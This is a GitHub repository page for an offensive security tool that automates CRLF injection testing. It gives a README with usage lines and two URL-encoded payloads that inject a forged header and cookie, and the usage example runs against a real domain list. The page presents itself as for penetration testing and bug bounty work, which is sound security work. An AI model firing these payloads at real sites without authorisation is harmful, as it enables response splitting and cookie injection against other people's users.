Skip to content
/ crlf-injector Public

A CRLF ( Carriage Return Line Feed ) Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.

www.owasp.org/index.php/crlf_injection

License

MIT license
45 stars 21 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

rudSarkar/crlf-injector

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits

LICENSE.md

LICENSE.md

 
 

LICENSE

LICENSE

 
 

README.md

README.md

 
 

crlf.py

crlf.py

 
 

file.lst

file.lst

 
 

process.png

process.png

 
 

Repository files navigation

CRLF.py

CRLF - Auto CRLF Injector

Author: Rudra Sarkar

Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.

Compatibility:

  • Any platform using Python 2.7

Requirements:

  • Python 2.7
  • Modules: requests

Install Requests Modules:

$ pip install requests

Usage:

$ python crlf.py

Use $ python crlf.py [domain_list.ext] [crlf_payload]

e.g $ python crlf.py mail.ru.list /%0aevil-here:malicious_cookie1

Payloads:

/%0aevil-here:malicious_cookie1

/%0d%0aevil-here:malicious_cookie1

Screenshot:

Process:

  Process   Regards!

Rudra Sarkar

About

A CRLF ( Carriage Return Line Feed ) Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.

www.owasp.org/index.php/CRLF_Injection

Topics

python bugbounty toolshacking crlf-injection

Resources

Readme

License

MIT license
Activity

Stars

45 stars

Watchers

1 watching

Forks

21 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages